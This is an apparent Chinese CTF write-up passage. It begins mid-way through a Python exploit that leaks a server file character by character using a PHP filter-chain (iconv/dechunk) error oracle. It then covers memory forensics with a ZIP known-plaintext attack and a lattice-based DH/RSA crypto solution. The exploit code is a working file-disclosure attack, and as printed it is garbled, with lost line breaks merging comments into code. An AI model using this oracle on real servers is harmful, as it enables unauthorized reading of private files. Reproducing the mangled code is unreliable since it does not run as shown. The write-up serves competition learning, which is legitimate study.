                elif not req(f'{prefix}|convert.iconv.CSISO5427CYRILLIC.855|dechunk|{blow_up_inf}'):
                        return '*'
                elif not req(f'{prefix}|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
                        # freturn 'f'
                elif not req(f'{prefix}|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
                        # Freturn 'F'else:
                        err('something wrong')
        elif not req(f'{prefix}|string.rot13|dechunk|{blow_up_inf}'):
                # n-s N-Sif not req(f'{prefix}|string.rot13|{rot1}|dechunk|{blow_up_inf}'):
                        # n-rfor n in range(5):
                                if req(f'{prefix}|string.rot13|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):
                                        return 'rqpon'[n]
                                        breakelse:
                                err('something wrong')
                elif not req(f'{prefix}|string.rot13|string.tolower|{rot1}|dechunk|{blow_up_inf}'):
                        # N-Rfor n in range(5):
                                if req(f'{prefix}|string.rot13|string.tolower|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):
                                        return 'RQPON'[n]
                                        breakelse:
                                err('something wrong')
                elif not req(f'{prefix}|string.rot13|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
                        # sreturn 's'
                elif not req(f'{prefix}|string.rot13|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
                        # Sreturn 'S'else:
                        err('something wrong')
        elif not req(f'{prefix}|{rot1}|string.rot13|dechunk|{blow_up_inf}'):
                # i j kif req(f'{prefix}|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):
                        return 'k'
                elif req(f'{prefix}|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
                        return 'j'
                elif req(f'{prefix}|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
                        return 'i'else:
                        err('something wrong')
        elif not req(f'{prefix}|string.tolower|{rot1}|string.rot13|dechunk|{blow_up_inf}'):
                # I J Kif req(f'{prefix}|string.tolower|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):
                        return 'K'
                elif req(f'{prefix}|string.tolower|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
                        return 'J'
                elif req(f'{prefix}|string.tolower|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
                        return 'I'else:
                        err('something wrong')
        elif not req(f'{prefix}|string.rot13|{rot1}|string.rot13|dechunk|{blow_up_inf}'):
                # v w xif req(f'{prefix}|string.rot13|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):
                        return 'x'
                elif req(f'{prefix}|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
                        return 'w'
                elif req(f'{prefix}|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
                        return 'v'else:
                        err('something wrong')
        elif not req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|dechunk|{blow_up_inf}'):
                # V W Xif req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):
                        return 'X'
                elif req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
                        return 'W'
                elif req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
                        return 'V'else:
                        err('something wrong')
        elif not req(f'{prefix}|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):
                # Zreturn 'Z'
        elif not req(f'{prefix}|string.toupper|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):
                # zreturn 'z'
        elif not req(f'{prefix}|string.rot13|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):
                # Mreturn 'M'
        elif not req(f'{prefix}|string.rot13|string.toupper|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):
                # mreturn 'm'
        elif not req(f'{prefix}|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):
                # yreturn 'y'
        elif not req(f'{prefix}|string.tolower|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):
                # Yreturn 'Y'
        elif not req(f'{prefix}|string.rot13|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):
                # lreturn 'l'
        elif not req(f'{prefix}|string.tolower|string.rot13|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):
                # Lreturn 'L'
        elif not req(f'{prefix}|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):
                # hreturn 'h'
        elif not req(f'{prefix}|string.tolower|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):
                # Hreturn 'H'
        elif not req(f'{prefix}|string.rot13|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):
                # ureturn 'u'
        elif not req(f'{prefix}|string.rot13|string.tolower|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):
                # Ureturn 'U'
        elif not req(f'{prefix}|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
                # greturn 'g'
        elif not req(f'{prefix}|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
                # Greturn 'G'
        elif not req(f'{prefix}|string.rot13|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
                # treturn 't'
        elif not req(f'{prefix}|string.rot13|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
                # Treturn 'T'else:
                err('something wrong')

print()
for i in range(100):
        prefix = f'{header}|{get_nth(i)}'
        letter = find_letter(prefix)
        # it's a number! check base64if letter == '*':
                prefix = f'{header}|{get_nth(i)}|convert.base64-encode'
                s = find_letter(prefix)
                if s == 'M':
                        # 0 - 3
                        prefix = f'{header}|{get_nth(i)}|convert.base64-encode|{r2}'
                        ss = find_letter(prefix)
                        if ss in 'CDEFGH':
                                letter = '0'
                        elif ss in 'STUVWX':
                                letter = '1'
                        elif ss in 'ijklmn':
                                letter = '2'
                        elif ss in 'yz*':
                                letter = '3'else:
                                err(f'bad num ({ss})')
                elif s == 'N':
                        # 4 - 7
                        prefix = f'{header}|{get_nth(i)}|convert.base64-encode|{r2}'
                        ss = find_letter(prefix)
                        if ss in 'CDEFGH':
                                letter = '4'
                        elif ss in 'STUVWX':
                                letter = '5'
                        elif ss in 'ijklmn':
                                letter = '6'
                        elif ss in 'yz*':
                                letter = '7'else:
                                err(f'bad num ({ss})')
                elif s == 'O':
                        # 8 - 9
                        prefix = f'{header}|{get_nth(i)}|convert.base64-encode|{r2}'
                        ss = find_letter(prefix)
                        if ss in 'CDEFGH':
                                letter = '8'
                        elif ss in 'STUVWX':
                                letter = '9'else:
                                err(f'bad num ({ss})')
                else:
                        err('wtf')

        print(end=letter)
        o += letter
        sys.stdout.flush()

"""
We are done!! :)
"""print()
d = b64decode(o.encode() + b'=' * 4)
# remove KR padding
d = d.replace(b'$)C',b'')
print(b64decode(d))

Misc

ez_Forensics

把镜像丢进Passwarekit​进行识别提取:

image

有第一部分的flag:flag{194a019a-1767-91

查看进程信息,发现有Winrar​:

image

filescan​一下,然后查看桌面文件:

image

提取这三个文件,其中key.rsmr​是鼠标记录

image

打开压缩包发现readme.txt​,桌面也有一个readme.txt

名字相同,怀疑是被修改了,查看编辑前的版本:

image

替换修改,打包一下:

image

CRC校验值相同,可以明文攻击

这个地方我用bkcrack​跑明文攻击,跑到100%,没找到密钥。。。

又尝试了好多压缩软件都不行,最后360压缩可以了

image

[ 6296ee7a 28ddd715 d09626ae ]

恢复解密文件,有一个table,查看hex开头是89504E47​,改后缀为png

table

然后按照鼠标画圈的顺序恢复key

​​58ccd03acfee30e4846e959acf1e0c2

顺序是:a91e37bf

volatility​提取cmd记录:

image

SET SECRET​但是不知道设置的哪个环境变量,但是查看的时候翻到了火狐浏览器的环境变量:

image

解密aes:

image

出第二部分flag:3a-f140-2626195942a0}

合并起来:

flag{194a019a-1767-913a-f140-2626195942a0}​​

Reverse

Story

源码里就有:

image

Crypto

DHRSA

因为t1和t2只可以取01,所以pq组合一共四种情况,单个来看p就只有两种情况

题目给出了62组

$$
C_i=g^{c_i}(modr)
$$

肯定有一个线性组合使得

$$
a_1c_1+……+a_nc_n=0
$$

可以凭此构造格子

然后gcd两组来求r

from Crypto.Util.number import *
from gmpy2 import *
cs = [9771395973011655803041049350400889693558053786906788399593857181577256033087775470396528142785531153656250742163382306394790826547696369519066900832598632, 8272821018041191335817314516024870641634584838709754134295649414123178842937800314505950304166260273130361466329869880024580711311122266329063823157928578, 9224196545381524434689958500941052085722509493323098161219607220849299786695264643219965900283680542442505315754998495711744726427299710433730839117822341, 1008469491610938216099437983993305774398678547360061529021095399886442276321623596589458980857784117593111375842386009804225494459153563491699302948435260, 7616413788891104674175703849368746136014029498968757620534065604935400737852925875633996435081025804169137754721194517660132118370608033038162779303724417, 7584549797616896430743312033954227311758800006881758430848397006388599762762869550122276429056861398410906389124143882721771887174154825862686488628829556, 4857850091039904852357309328743353934107579830869744999969242154323443783533786032181281694960711385606506579359066323294671727886753617501542207839926790, 4779727649310569079487754450225462592903787505885564750560744245118977747200287996364352093535624060190258736345242819222383024403591273643223505871273937, 6240985007555841990183784512088706027373526355604287377336898927100013200525239698399664369530638033756622723154794368086253680721133641187916109948879111, 1440004269550837930069561548693107407163496872089856298023372643037792305541293783438854412197014895824653797468093046886645122408623089543218627931731325, 8686467414540984479883981478664234832161994713954432326787817013306458410596539074149482305300161480885280412716015692242140611122632851558942831571969449, 6397234126429549747756931006796154340671325181680459289481852293242757656214345178451346712629678435704959420962366420623987135911533358778558089423502498, 5154817535857960073707963384183439709586920855602419290358137674661940402006427565850098044416106066822250682276679669427811522910392723378330585054966700, 6184278632740706257559650240918607859111635320246236350819849684258206208438537742565177660943106119452934940861754989735447208681922747166941649495976923, 514519457570888784111073733278759745960446948568600524535727800070517989361086156941193628192360355612444575477626855845530581162562486612799738968800436, 5311179737168594393380387500131139705986775208655298446331668896011718110177021579502837999280939324755245947626117007502618967826854797851195037805622236, 8033599809537397449739222496469120219661376235214159758353162913590149327454313351545152320436531803584693342228310830634381278274606584366951286641362730, 2051625798280743150753404437482448207490537448098276190886365473636618906352671153607072757637879642085246666882064116331781620620841788195957363592387053, 2539152850168044131443627430873275266571063321601722994164719426048365057966357258486918206613866328867765905303734883912389577646355187342721384787506424, 9008908156612389991869885743985152554064654014600155665167153423864293462953589139136986609123719868913243556793248046592418855144217044361551263069240329, 6803170457708082062222117551095454287816962526481935030699353660846602430067188624302070998045883149555451692203871683262881999463532897654910797581195808, 4342007382390611975323457544296213170925503797306373729093603079594595092127747819980737254901463722358222828653606693041546906868729342511025828114827555, 2183664030657588356550029801438062011696791479721050550709966793162412846063789309880633528422512509596396589027054806885718000781675200132948682901735072, 2676285609364173142435111238008478736925861736006673806161674291385422525644573866393884559955797190936826061311631872102982470113155601869660746965071177, 8615874523824944863326511893784594675845807173709888717969574953112250736770386882455890231726119912526638461175690953959512359266034187901901745135706561, 1922646621448654308731099545672266646199287008430733010575325812508661111446471076682347110401317422369989378526004562648871357970249460937394842515685185, 6894871210132644262428509750998583740904489962095581087369230603087765684170566562618210470507349665138476792990203975299249821414179702286974952108308908, 8398850863544147035551562678201580675747803434116699749690629994755381632713482161869699483278515661816496168924359580050657657882041095486710223992321329, 1103558165483499140082633087824207492178842328222110372040372946709534675630035763166805943256640202241094017653484224302180964104596684146937840328056737, 7616579463842058663956538981992016396022484825826970703537944742179864728054422301128359842636130918256966522509540733872238802637426513398702545806054711, 6093447739151580910739487321763042257093662388037797880895310207982236604441330252766468220299149762533760095283275798097190217074233307392113562823550055, 10465708577087930103510908920924173959169681089467884381473219422666982876773505479708456794740072800789393882374346444466352555495590221538783880064776747, 10605081135879456867591725577517023044111094541257015514457259942700651158240017447609481228325274221251138332472541861502584164767676203023712244274563455, 7012967814560006293648272691588998637134646550513726240939227681138521268647913550031357555656822375449692357834760862939125678022083697005023949012937826, 9566656433910278946608540460883633932965000205012896340833001038283123101223701427477589683926930217368102196484226996825067156057344586227513445332021767, 2721818943333539016612702886003757042711221957746352716329164140315057299599294376527853842627041607856599108409067242878086913811106172846700928991925332, 4144627466364250800792304430295727495765908688276307878705582041004315000843879026660231248370219826205974342880901591994064400526974281681872092036583360, 9540229122766028258950784907897705565229274273296271759903007071156790536497946170835990412260104194662363036458196704652014673749423907001422969301809735, 1639227724203684234308217138545474026323237719482542327552473107710807011133804919537706806005714199832933437746623612694760178087234912102227060818821785, 9812993094473406654107168236073328125261683326416570529798110665650382711989965459219636103724052319209618994008458512967332799786202713476231778145396012, 2295945877832163407010322597202468334423912618570523561408751634022642288041211919141444020534567414838616766574885544294608146290275196633317265741751883, 9510449404755931940739075753727979306152379874217663126425580183559239591750519861496413596214874972534376534993718874211977861576694865786452346685079911, 10068147483643758261431583499786421277358011934810052604576663733186448278692924596285775100821424123316623283150527146388692332413482534235601982259977735, 2631234993744978915205564833565878360368731366415913670587100334887962760531396262264711195036515169369826941240935633330766040802965514627738944637938312, 6245294849421435385844087800549243031764408455344779721346137213398733894945891825456797247066883570457936878961279970460851977076618685374684565064011000, 6360363966721028786772622616611684728619548477569800250827865049949218224355237880474537231095562612445154765235574973379248267372638478052576176958426893, 1374748162508202790788170508306104425630569793823780168413397583022077368721695853340144854392562470438547910808098360313836434314988050372444336622005939, 5923217938277229682931188522357086770659121539648879409111011010394233354709847779031983270180639474376432548198701507987857799064509215702865822042304601, 7912839476386587387207319066546154431303391126303542720169612844312157005989844595260178178012638805394179538160638000205856329132154797855491159908316825, 6989926221520213501850965026707723308003729842929136196471532798477250492469686905792383597327729987647258260679589434132606672791962970232535673677457343, 7743517306425849045036228617259140769029348885373635895025449298661791309426243487821079837754283770418719515017823088333131732906019584031613089554304420, 8228064864747011743632289680585658563799395413457976150375450901737657367769151734010130073897880115256353583883179331874018722072209939664833555092694721, 4450010894214163101815316096785687407009534536454667314772668698898901466717062024203232842836467444518468762248095700604843848000837792037078167960588129, 3345145753946526259843311380078979114463790107484347721093757348344369710001786833260087626842713916819817705043732430232104986213669502412941799451378137, 411849644960126121049073725849225927315782894933779533599764821078891693733248333351876043256232845616011887951112364725817456430915422262433159009162810, 9070143529402968690182170891432541186624926767431297375488478998005501150531907444673746153178512705131935537332064808055931815290499208703009298348987029, 8213219975300001733306975337422619448976655134956761580838409562843071867497978077677323154897320151428562911412904177153952495821256190104983710364972232, 8349268362247390165742295418698754062525395439803096486083911273583071915526604580013826747245858881943244980602181641712932537086321708434534161167021746, 7509668912649960854961670452151045790218876057511153068414836771472470302685381796706603632853037886139531473147215132055911891985689199108998563497337555, 2131204693980301034358939270790217044118874047688648828664882105193013493634681490541248365340356833966291527168399270652784557243494787018476812050661672, 94628342448609390736618683703832565995079347007818829426672834242066920587964251445868380536604059942251553430692068690115557207157069742355783092463878, 8730838489034161299210542834892857189755559366635478365056603032000438656615452617258885131782074530795256008985786448336781306335727153569211343667279688]
Cs = [8139606023160038223737079478941118590185130735073983268534523900466799026361464500424904356248753891316780445417573842978538788878976916399246204378441056, 6731047210123888962354325580924677204725121336252367061814596228770531939085170702108835833376855510135160514592212524395740859425722612967050674897558554, 8618477079542034439812499299348172601780082410118486479357089433765711733400709574657418048464225715724091467457454996920521245517408697962287328781660172, 9243753430474436162138755988303772102594989764465818886594050158035773372691908643200174705510107166901553683916448850166844368808268900160791189879886461, 5081325787403850070122342963066210472728109263877409302015934601768721956580972368361384922036489915214279268746375195256103574903758346112788101331060421, 1628416782427642576537753826054924818984220964280741905185643986017630454253562852051349318488828073385103084138926801432973213673304459124585445072035446, 1436555309056212704783260154843715809916541935750195541226776332006326501592432597657580990741764167962753224321573279559350979014777173060581697942160790, 8457854453119605903801540115672523550270614339671410689633028758723786021115482172319549655156915937495339811221100830546511268665457084873839271917131026, 7516353799796514587790845891436757011323761869044622559902758322970504358548733636938457083535644723388210752578649311718854524047992380524533863744945353, 9434919345479338423866102885320010476913815819406622512632495616332678841660980531307718949753248131094030185131327688989259983673428169616967926536549981, 2376239907248313997443412718623933371621229548870946158597654591040113647645833393016706072537549866458668992268347350086597733853645352669964694698209002, 9555521900012304016219328488701400452052438846888508591910947639752080094465009622568296701465965949214617545676819204984390042310077453137495863845140433, 10496354188266114334878155842846706785121191402898647321044421232085059338092949629088561418326794767424754926615669196297619927139682997591511869107757767, 1684156496026762626171388002895398201456656580507920519170549327618625423797366792075116257872626605002727580286505567977884867816788235806054395449066065, 5279615925666476607393445956667230310409008481693792914481184221733250114518482573243209594428350182047703213893421465095795062348864307647570060060929176, 7950931857867551139311900477185535034704935066837216411367230952920436620973145933605969605301127988180373211783836800949372831376277678318587671147544812, 7363787374432448634707849149426821610638073413299588217259428219319013703633673213128364594170782521444300561327439516770200289550957339013848496654479674, 183450164326164222959035748035117444906396515108356683081562421715885871762215055266356577117853857983960152113987173865737809535655981046541363297829205, 585756688754350904695498684365256423604945135941557021419402686079315456435190920620640430630667903578283746531894135845972607789350856875988416502844449, 9289266081720210076238040168621209559442099796466275176059195696650031235127294873962598972974303719540193547570326682610716804488839647659399702777957625, 1643238506993581048346556120580389927181837132286120379981936140856072993887401596354919001634656489755991432524216993664019969824657062288544062028928533, 493026654262682081757325540069692089465639980280029378402651778901949559259891879708898948140085681814535573742826826476110468079719504023996492906928688, 4073523873469606498132661552527997945998461149945931939857824343164584528157149801459596694594269553069502164902110100517378462894925649504277727979281804, 5526482056568056411108977820792619135217540155238365597030616097363450824489623669450770143884401364973046003465586645009073389711906524301615929500348726, 5107189939984481100533490360348985070143842143450775903588073100128259350554726370669643384672212451094463934881485403663403067465232413753838963311526164, 1338120870830450195003052688429825997002475569804112786250323375715461269426478757154438256599704658856730012976479429755682431385902070463000523922633485, 4504561167146108444334786062824835552812933921903812225075224152011097132132118554220621595724113517743942246047411740399148959904624805479075676539627179, 3703218408290286096237533977791248727917587395526646685991666829723493582004703462287201605547754231978350368593066630613342669719057740600396410750130713, 4235755736045407691815950643821304187431993958805648566903603216981196118628996746825748374999189542155866127214016604808037761824195261283013629856811915, 7613956756687648883142522461784563921781848082096750733536680658594629733709520676386003626030270049444324311590771818500145651113869039994374079094176389, 5582983596876204457658414033643566916925741632988960872444165950150568674358568563750393895942021859292068409582131557028759494904690654084568015540958387, 5560992116323139630261388939207466766129106144662938095552878745416852271253443975908911908133192704735692594156704890845632323597567684452235384416207560, 9427064851222629681715722784660850738968685559393550747518608089108082562625632566953024798342737795332503266772616759203825637407245190460310558481011553, 7751396645197086848500999313322914076346713513943719371985230447422327437680224631606199418400131531054197437203771034578401374585091741737281898844967403, 546093125292516349289304554067672438202855144942643384818235748136017154830766962667037846395737218002229971788635923471525750360984025965229960880138015, 8708958215469085753181574046119339162501035682760128157682876145155787404749378257091769354933553751411564910339364737060790592181298353503681772458140296, 6503617996420087519121999497592564753358269947368728580707909964656915488241450906561184006580947106530919025122027342914550816267613360293886470939638147, 3133970773026394333676271959039363252995983077058359556442048424274114546996306660500141330973026720710258226380296916344738000286752906153301531192145588, 8270247841707725063403103311221827713218425321540707437203780169848645054354422606444548218532045886590764337285894491599474684125156258721180140005227879, 6348941299458047229603035571553554254637277183847732341685362698641456768747093952193394610221610467378544424914425383192254952105296121873394965907483421, 5994603535835080395017357896928637354820646460778770882917760856532399920260202826867821549261784608902276626362339800015674269038970155327507870854956789, 4425254452956426634646344097191468359576571843417153278931037524323172136339917846491397351511099933539635058142094213472513676095819902241563092702688501, 2486099330626766737257165308745024530097078778638782229355520177306987440002696878039888805275868528396743863481534888478552983793450062429371941132535078, 4167116570391804600255654075462038844507091559173265725625706455067299132147050347586004334123441342458308129150386241209679630518761986850258774882817936, 10185168995554407266816276622812659886483756602705301925351101031752727294301531965596293802652862084495500685833881517475134558625964721775303100038614160, 5456722125978665120229905841107251183374955393168570741251463630873840897267613318536370613164271366075428107312082239190184994439809325775182251507346825, 2939543075586963360992868413324864290837308216610370795940797957094565066506489483089379278658514795189713701943386974203309580258770009927268150497535566, 8743821334723368976778894507033225804145157545090682229505938930782456568432992185052055300701880227956622698441050884506223378607674824402614530393729367, 9157713754021073809434421172656952683393171530300224019784181318620517764533872565796337369744270420561987117136110183189161447503240922447481705416792933, 5878746531427980282714190471263188376089128406106851686623310774890789241719381568167580210027581541900359110459878728688406025608100014784866859967415069, 4723171396311923892248342600001144805520828588734579829312137837892547473549988680030764497200183283689846461436720606808050677973475562028290802376894040, 2843792191169572505424299937637335345928688319904295706002781014868972565908100208212634694593060855068754141546774316683717972204080538819157716088784950, 5649760949181251560547472271598936178113043683541495970916235935289470274241813254378868964502496661853777833292127852117859645515779670872354035434010971, 4449864701816030502869094392702038297167798303739676692580712480289620671504896451221373121095485571657769741067946182294271935296786038388717131050743105, 6015559474636248088561229697316533148096304587912722704321346276808664704462122988070466258472892491390452320498582384705624788234989258086915479317589554, 404470006641663392206752968026191050354477219085475176007692089093673919513513760805174543858749324166919507964495235284709646802332010921978754916213842, 6400060591708772742036825960295348204573787431673486966335080578765346768135800288344580251211949027002658413241092081227396455353862253913043273557206036, 4139621554482255887742647243977351847150733617205749719993940245058866579901045219083635101090422724513229414103870573743420533567984369212416328299201648, 3168193697707475529193822215328153723009219332354194589973887573663124790963735981601241436331461792216723819214300690004321006157765917632838358657075965, 7458978598400749076925462287692314594837852961494454950837549434543148869247423634127441385921463980373281159265749886433453416941713109715452118403890765, 10491155550479668966723346610934052049109810767277413338024524325905994360818069675936484156539236718504294063495115065935392782490138348869081026608020887, 8076329104944759931627228905172809552808063163769317826043905443799635345365021015532382100166858241152720115250871898592915217180839896374819810099249842]

length=62
cs_=[]
for i in cs:
    cs_.append(i*2^17)
L = Matrix(ZZ,62,63)
for i in range(len(cs)):
    L[i,len(cs)] = cs_[i]
    L[i,i] = 1
L = L.LLL()

xx = product([ZZ(y) ^ x for x, y in zip(L[1][:-1], Cs)])
yy = product([ZZ(y) ^ x for x, y in zip(L[2][:-1], Cs)])
r = gcd(xx.numer() - xx.denom(), yy.numer() - yy.denom())
print(r)

之后用共模攻击的方式来求得g

s,s1,s2 = gcdext(cs[1], cs[2])
g = pow(Cs[1], s1, r) * pow(Cs[2], s2, r) % r
print(g)

最后尝试两种情况,求出构造pq的C的生成方式

再用离散对数求出小c即可恢复pq之一

from Crypto.Util.number import *
from gmpy2 import *
X = 197551296081022143608034360606381334253374533627365455002683616928330857539205836504075700389569213696043700490195977045586318090211726350917451410932216
W = 10625560347436147537644301075885059900758953251551866239435327407977591190018531918316486861730777808988185029637608372445416280896280058313924537678128258
c = 61040814411609979711931510878805548760848686739454567580358315369154260598969544907138563610735920809370306294050956464828615417082277087799410050319871691154003766481799397897519555113273982347768485719165972634089532894585256662433949694618032747408071953491187718726218120284389638124624152241321006634774
n = 66022752859576751705544115674843820574619778139841743306742674741819040147745776264697779394213058328572691946505564202779552568613562176486470653760142864852745249430164256770469301179840812051842363261404790355057115296671805975126795017665392798621718740402876024901551851638786170466127104615340863081593
r = 10667924450645948100608927157603781268991945924055943816082403476371801785989561454936076097627912279097114498936308342036099904242687703932444772733243819
g = 6019887080267290264230260653584196278384320835640816590398803560025633855808434001764263669714920086295176455397726166743099512294951861972283858355052731
C = (n*W)%r
c_ = discrete_log(mod(C,r),mod(g,r))

assert pow(g,c_,r)==C

#p = ZZ(C * W^1 * pow(X, c, r) % r)
p = ZZ(C * W^0 * pow(X, c_, r) % r)
q = n//p

phi=(p-1)*(q-1)
d=invert(e,phi)
m=powmod(c,d,n)
print(long_to_bytes(m))